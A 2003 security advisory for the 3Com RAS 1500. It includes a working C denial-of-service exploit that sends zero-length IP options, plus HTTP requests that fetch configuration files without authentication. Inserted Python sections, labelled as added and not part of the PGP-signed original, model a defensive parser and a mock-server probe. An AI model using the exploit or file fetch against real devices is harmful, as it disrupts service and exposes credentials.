Message-ID: <Pine.LNX.4.44.0303241654110.17806-100000@isec.pl>
Date: Mon, 24 Mar 2003 16:56:21 +0100 (CET)
From: Piotr Chytla <pch@...c.pl>
To: bugtraq@...urityfocus.com, <vulnwatch@...nwatch.org>
Subject: 3com RAS 1500 Remote vulnerabilities.


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Synopsis:   3com RAS 1500 Remote vulnerabilities. 
Product:    3C433279A-US http://www.3com/ras1500
Version:    Firmware X2.0.10

URL:        http://isec.pl/vulnerabilities/isec-0009-3com-ras.txt
Author:     Piotr Chytla <pch@...c.pl>
Date:       February 27, 2003


Issue:
- ------

 The 3Com SuperStack II Remote Access System 1500 is a telco device which 
 provides dial-in access to users over BRI-ISDN and analog lines. 
 It contains two remote vulnerabilities: the first is a denial of service 
 that crashes the system, the second can be used to read configuration files. 


Details:
- -------

1. Remote Denial of Service 

 It is possible to remotely reboot the RAS 1500 (router unit) by sending a
 malformed packet whose IP option length field is set to zero. The reboot 
 can cause the loss of all switched connections on the PRI-ISDN interface.
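
 The following is an added example, not code from the advisory or from the
 RAS 1500 firmware. The advisory only reports that an IP option length of
 zero reboots the router; the "naive" walker below models the usual cause
 of such a crash (an option parser that advances by the untrusted length
 octet) and is an assumption, not the device's actual code. Beside it is a
 strict RFC 791 walker with the checks a firmware stack needs, and a small
 header builder that carries the same option word the exploit below inserts
 (type 0xe4, length 0). All packet bytes and addresses are constructed.

```python
"""IPv4 option walking, and why a zero option length is dangerous."""
import struct

IPOPT_EOL = 0  # end of option list, single octet
IPOPT_NOP = 1  # no operation, single octet


def decode_option_type(t):
    """Split an option type octet into (copied, class, number) per RFC 791.
    The advisory's exploit uses 0xe4: copied=1, class=3 (reserved), number=4."""
    return (t >> 7) & 1, (t >> 5) & 3, t & 0x1f


def naive_walk(options, max_iter=64):
    """Walker that trusts the length octet (assumed failure mode, not the
    device's code). Returns (options_seen, stuck). A length of 0 never
    advances the offset, so the loop spins in place; max_iter only exists
    so this demonstration terminates instead of hanging."""
    i, seen, iterations = 0, [], 0
    while i < len(options):
        iterations += 1
        if iterations > max_iter:
            return seen, True
        t = options[i]
        if t == IPOPT_EOL:
            break
        if t == IPOPT_NOP:
            i += 1
            continue
        length = options[i + 1]          # unchecked: may be 0 or too large
        seen.append((t, bytes(options[i:i + length])))
        i += length
    return seen, False


def parse_options_strict(options):
    """RFC 791 walker with the checks the naive one lacks: every multi-octet
    option has a length octet, the length is at least 2, and the option
    fits in the remaining option area. Raises ValueError otherwise."""
    i, n, seen = 0, len(options), []
    while i < n:
        t = options[i]
        if t == IPOPT_EOL:
            break
        if t == IPOPT_NOP:
            i += 1
            continue
        if i + 1 >= n:
            raise ValueError("option 0x%02x at offset %d lacks a length octet" % (t, i))
        length = options[i + 1]
        if length < 2:
            raise ValueError("option 0x%02x has invalid length %d" % (t, length))
        if i + length > n:
            raise ValueError("option 0x%02x length %d overruns option area" % (t, length))
        seen.append((t, bytes(options[i + 2:i + length])))
        i += length
    return seen


def options_well_formed(options):
    """True if parse_options_strict accepts the option area."""
    try:
        parse_options_strict(options)
        return True
    except ValueError:
        return False


def build_header(options, payload_len=0, src=b"\x0a\x00\x00\x01", dst=b"\x0a\x00\x00\x02"):
    """Constructed IPv4 header carrying the given option area, laid out the
    way the advisory's exploit does it (id 0x1337, ttl 255, protocol 0xaa).
    Checksum is left zero; the addresses are placeholders."""
    if len(options) % 4:
        raise ValueError("option area must be a multiple of 4 octets")
    ihl = 5 + len(options) // 4
    total = ihl * 4 + payload_len
    fixed = struct.pack("!BBHHHBBH4s4s", (4 << 4) | ihl, 0, total, 0x1337, 0, 255, 0xaa, 0, src, dst)
    return fixed + options


def options_from_header(header):
    """Slice the option area out of a raw IPv4 header using IHL."""
    if len(header) < 20:
        raise ValueError("header shorter than 20 octets")
    ihl = (header[0] & 0x0f) * 4
    if ihl < 20 or ihl > len(header):
        raise ValueError("IHL %d inconsistent with header" % ihl)
    return header[20:ihl]


# Constructed samples. EXPLOIT_OPTIONS is the option word isec-options.c
# inserts; VALID_OPTIONS is a Record Route option (type 7, length 7,
# pointer 4, one empty slot) followed by an end-of-list octet.
EXPLOIT_OPTIONS = bytes([0xe4, 0x00, 0x00, 0x00])
VALID_OPTIONS = bytes([0x07, 0x07, 0x04, 0, 0, 0, 0, IPOPT_EOL])
OVERRUN_OPTIONS = bytes([0x07, 0x0c, 0x04, 0])   # claims 12 octets in a 4-octet area


if __name__ == "__main__":
    for name, opts in (("exploit", EXPLOIT_OPTIONS), ("valid", VALID_OPTIONS), ("overrun", OVERRUN_OPTIONS)):
        area = options_from_header(build_header(opts, payload_len=19))
        print(name, "naive:", naive_walk(area), "strict:", options_well_formed(area))
```

 The point of the two walkers side by side: the zero-length option is not
 exotic, it is simply an option whose length octet fails the "at least 2"
 rule, and a stack that checks that one bound (plus the overrun bound) can
 drop the packet before it reaches any forwarding code.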

2. Configuration file read

 An unauthorized user can read configuration and system files through the
 RAS 1500 web interface.
 
    GET /download.htm HTTP/1.0 
    HTTP/1.0 401 Unauthorized
    WWW-Authenticate: Basic realm="RAS1500"
    Content-Type: text/html
    Server: Allegro-Software-RomPager/2.10
 
    GET /user_settings.cfg HTTP/1.0
    HTTP/1.0 200 OK
    Content-Type: multipart
    Date: Mon, 25 May 1998 00:26:38 GMT
    Last-Modified: Tue, 01 Jan 1901 00:00:01 GMT
    Content-Length: 1258
    Server: Allegro-Software-RomPager/2.10
    [..]
    
    content of user_settings.cfg

 The RAS 1500 requires HTTP Basic authorization only for download.htm, the
 download manager page for configuration files and system software.
 Unfortunately the system images and configuration files themselves are not
 protected by HTTP authorization, so they can be fetched directly by name.
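
 The following is an added example, not code from the advisory, iSEC or
 3Com. It reproduces the gap just described with a constructed mock server
 that answers the way the transcript above shows (401 with realm "RAS1500"
 on /download.htm, 200 on /user_settings.cfg) and a probe that reports
 files served without credentials while the page that links to them
 demands them. The protect_artifacts switch is an assumed "fixed" behaviour
 for comparison; no real host is contacted.

```python
"""Probe for a download page that is gated while its files are not."""
import http.client
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer

GATE = "/download.htm"              # the only path the advisory says is gated
ARTIFACTS = ["/user_settings.cfg"]  # files reachable from the gate page


class RomPagerLike(BaseHTTPRequestHandler):
    """Constructed stand-in for the device's web server (not RomPager)."""
    protect_artifacts = False  # False reproduces the advisory; True is the fix

    def log_message(self, *args):
        pass  # keep the demo quiet

    def do_GET(self):
        gated = self.path == GATE or (self.protect_artifacts and self.path in ARTIFACTS)
        if gated and "Authorization" not in self.headers:
            self.send_response(401)
            self.send_header("WWW-Authenticate", 'Basic realm="RAS1500"')
            self.send_header("Content-Type", "text/html")
            self.end_headers()
            return
        if self.path == GATE or self.path in ARTIFACTS:
            body = b"[constructed configuration data]\n"
            self.send_response(200)
            self.send_header("Content-Type", "application/octet-stream")
            self.send_header("Content-Length", str(len(body)))
            self.end_headers()
            self.wfile.write(body)
            return
        self.send_response(404)
        self.end_headers()


def start_mock(protect_artifacts):
    """Serve the mock on a random loopback port; returns the server object."""
    handler = type("Handler", (RomPagerLike,), {"protect_artifacts": protect_artifacts})
    server = HTTPServer(("127.0.0.1", 0), handler)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server


def fetch_status(host, port, path, timeout=5):
    """GET a path without credentials and return the HTTP status code."""
    conn = http.client.HTTPConnection(host, port, timeout=timeout)
    try:
        conn.request("GET", path)
        resp = conn.getresponse()
        resp.read()
        return resp.status
    finally:
        conn.close()


def probe(host, port):
    """Report artifacts served with 200 and no credentials.

    'gate' is the status of the protected page; the finding is meaningful
    when the gate answers 401 while the files behind it answer 200."""
    gate = fetch_status(host, port, GATE)
    exposed = [p for p in ARTIFACTS if fetch_status(host, port, p) == 200]
    return {"gate": gate, "exposed": exposed}


if __name__ == "__main__":
    for fixed in (False, True):
        srv = start_mock(protect_artifacts=fixed)
        print("protect_artifacts=%s ->" % fixed, probe(*srv.server_address))
        srv.shutdown()
        srv.server_close()
```

 The check is deliberately credential-free: it never tries to log in, it
 only compares what the gate page and the artifacts answer to an anonymous
 GET. Extend ARTIFACTS with whatever the download page on your own device
 links to before pointing probe() at it.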

Impact:
- -------
 
 A malicious user is able to remotely crash the RAS 1500 router unit, which 
 drops all switched connections on the PRI-ISDN interface. 
 A remote attacker can also read the RAS configuration and, once the access 
 passwords have been broken, modify it.


Exploit:
- --------
Below is a working proof-of-concept exploit for vulnerability no. 1. 
 
- ------X<------isec-options.c------X<------
/* 
 * 3com superstack II RAS 1500 remote Denial of Service
 *
 * Piotr Chytla <pch@...c.pl>
 *
 * THIS PROGRAM IS FOR EDUCATIONAL PURPOSES *ONLY*
 * IT IS PROVIDED "AS IS" AND WITHOUT ANY WARRANTY
 *
 * (c) 2003 Copyright by iSEC Security Research
 *
 * Builds against the libnet 1.0.x API (libnet_build_ip, libnet_insert_ipo)
 * and needs root for the raw socket.
 */
 
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <libnet.h>

#define OPT_LEN 4   /* one 4-octet option word: type, length, 2 bytes of padding */

void usage(void)
{
  printf("Args: \n");
  printf("-s [source address]\n");
  printf("-d [destination address]\n");
}

int main(int argc, char *argv[]) 
{
 int a;
 int sock, r;
 u_long src = 0;
 u_long dst = 0;
 u_char pktbuf[IP_MAXPACKET];
 char payload[] = "ABCDEFGHIJKLMNOPRST";
 u_char options[OPT_LEN];
 struct ipoption ipopt;

 bzero(options, OPT_LEN);
 while ((a = getopt(argc, argv, "d:s:h?")) != EOF)
 {
     switch (a) {
         case 'h' :
         case '?' : { usage(); exit(1); }
         case 's' : { src = libnet_name_resolve(optarg, 0); break; }
         case 'd' : { dst = libnet_name_resolve(optarg, 0); break; }
        }
 }
 if (src == 0 || dst == 0)
 {
  usage();
  exit(1);
 }

 sock = libnet_open_raw_sock(IPPROTO_RAW);
 if (sock < 0)
 {
  perror("socket");
  exit(1);
 }

 /* Plain IP header (id 0x1337, ttl 255, protocol 0xaa) with a dummy payload. */
 libnet_build_ip(strlen(payload), 0, 0x1337, 0, 255, 0xaa, src, dst,
                 (u_char *)payload, strlen(payload), pktbuf);

 /* The malformed option word: type 0xe4 (copied flag set, class 3, number 4)
  * followed by a length octet of zero; the remaining two octets are padding. */
 memcpy(ipopt.ipopt_list, options, OPT_LEN);
 ipopt.ipopt_list[0] = 0xe4;
 ipopt.ipopt_list[1] = 0;     /* option length = 0 is what triggers the reboot */
 ipopt.ipopt_list[2] = 0;
 ipopt.ipopt_list[3] = 0;

 /* Insert the option word after the IP header. */
 r = libnet_insert_ipo(&ipopt, OPT_LEN, pktbuf);
 if (r < 0)
 {
  libnet_close_raw_sock(sock); 
  printf("Error ip options insertion failed\n");
  exit(1);
 }

 r = libnet_write_ip(sock, pktbuf, LIBNET_IP_H + OPT_LEN + strlen(payload));
 if (r < 0)
 {
  libnet_close_raw_sock(sock);
  printf("Error write_ip \n");
  exit(1);
 }

 libnet_close_raw_sock(sock);
 return 0;
}

- ------X<------isec-options.c------X<------
 
- -- 
Piotr Chytla
iSEC Security Research
http://isec.pl/

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.7 (GNU/Linux)

iD8DBQE+fylwC+8U3Z5wpu4RAr7MAKDqCSwMeF78nlFiSRATmAmgTyfeHQCg09cg
kkYmmXxc8sgurfL8XUhGo2s=
=bAQc
-----END PGP SIGNATURE-----


